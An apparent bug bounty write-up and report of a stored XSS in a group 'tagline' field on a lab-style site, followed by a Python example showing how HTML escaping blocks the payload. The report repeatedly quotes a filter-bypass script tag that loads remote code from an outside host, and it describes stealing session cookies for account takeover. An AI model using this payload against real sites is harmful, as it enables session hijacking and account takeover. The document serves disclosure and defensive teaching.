After some simple payload debugging, I found that there is a filter.
Checked: https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
Found payload: <script%20src=//sec875.com/1.html%0A--%3E
It works.
Visit https://5cc259cfb319-sec875.a.barker-social.com/group/11 to trigger the XSS payload.
HackerOne treated the steps above as a valid report.
Post-exploitation: deploy a VPS, or point local DNS at 127.0.0.1, to prove that the XSS executes (SSL/HTTPS needs to be set up).
Open question: over repeated observation, the value of the tagline field is reflected on multiple pages; is the filter still present in those places?
Report title: Stored Cross-Site Scripting (XSS)
Endpoint:https://5cc259cfb319-sec875.a.barker-social.com/group/11/edit
Vulnerable Parameter:tagline
Payload:POST tagline parameter <script%20src=//sec875.com/1.html%0A--%3E
Body
I have discovered a stored XSS vulnerability affecting the endpoint 'group/11/edit' in the parameter 'tagline'. The payload requires a filter bypass and is simple: <script%20src=//sec875.com/1.html%0A--%3E
You can see a working proof of concept here:
https://5cc259cfb319-sec875.a.barker-social.com/group/11/
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554030/s8kv0pckkeyaxfuijrh3.png)
To reproduce:
1. After logging in, create a group and go to the following location
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554027/frqlt97d6oh4rtjrtbpl.png)
2. After simple debugging, I found that there is a filter. I checked https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet and found that the payload <script%20src=//sec875.com/1.html%0A--%3E is valid
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554027/frqlt97d6oh4rtjrtbpl.png)
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554029/jsv9dlgesgv0fkgzy21c.png)
3. Visit https://5cc259cfb319-sec875.a.barker-social.com/group/11 to trigger the XSS payload
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554029/ml2lep1mclz0m3itvbbi.png)
![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1722554030/s8kv0pckkeyaxfuijrh3.png)
4. Post-exploitation: you can deploy a VPS or point local DNS at 127.0.0.1. It has been proven that the XSS executes (SSL/HTTPS needs to be deployed). You will observe the XSS executing.
Payload used: <script%20src=//sec875.com/1.html%0A--%3E. There is filtering on the 'tagline' parameter.
Vulnerable parameter: tagline
Endpoint/URL: https://5cc259cfb319-sec875.a.barker-social.com/group/11/edit
Impact:
As the session cookies are not protected by HttpOnly, we can obtain them and achieve account takeover. As well as this, the CSRF token is stored in the DOM, which enables us to easily perform actions on behalf of the user.
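The following is an added illustration, not code from the report or from the target application, of why a stored tagline must be escaped at output time rather than relying on an input filter: the `%0A` newline inside the tag is ordinary whitespace to an HTML parser, so the decoded payload is still parsed as a `<script>` element with a `src` attribute. The unsafe renderer is a hypothetical stand-in for the vulnerable page; the payload string is the one quoted in the report.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# The payload quoted in the report, URL-decoded for rendering:
# "%20" -> space, "%0A" -> newline, "%3E" -> ">"
ENCODED_PAYLOAD = "<script%20src=//sec875.com/1.html%0A--%3E"
TAGLINE = unquote(ENCODED_PAYLOAD)


def render_unsafe(tagline: str) -> str:
    """Hypothetical vulnerable rendering: the stored value is concatenated
    into the page verbatim, relying on an input filter instead of encoding."""
    return f'<div class="tagline">{tagline}</div>'


def render_safe(tagline: str) -> str:
    """Hardened rendering: HTML-escape the value at the point of output, so
    '<', '>' and quotes can never open a new tag whatever the input filter did."""
    return f'<div class="tagline">{html.escape(tagline, quote=True)}</div>'


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> start tag the parser sees.
    A newline inside a tag is valid attribute whitespace, which is why the
    stored payload still yields a script element pointing at an external host."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_srcs.append(dict(attrs).get("src"))


def external_script_srcs(page_html: str) -> list:
    """Return the src values of all <script> tags found in a rendered page."""
    parser = ScriptSrcCollector()
    parser.feed(page_html)
    parser.close()
    return parser.script_srcs


if __name__ == "__main__":
    print("unsafe render:", external_script_srcs(render_unsafe(TAGLINE)))
    print("safe render:  ", external_script_srcs(render_safe(TAGLINE)))
```

The same check can be run against a fetched copy of a page that reflects the tagline, to confirm the fix holds everywhere the value is displayed (the open question in the notes above).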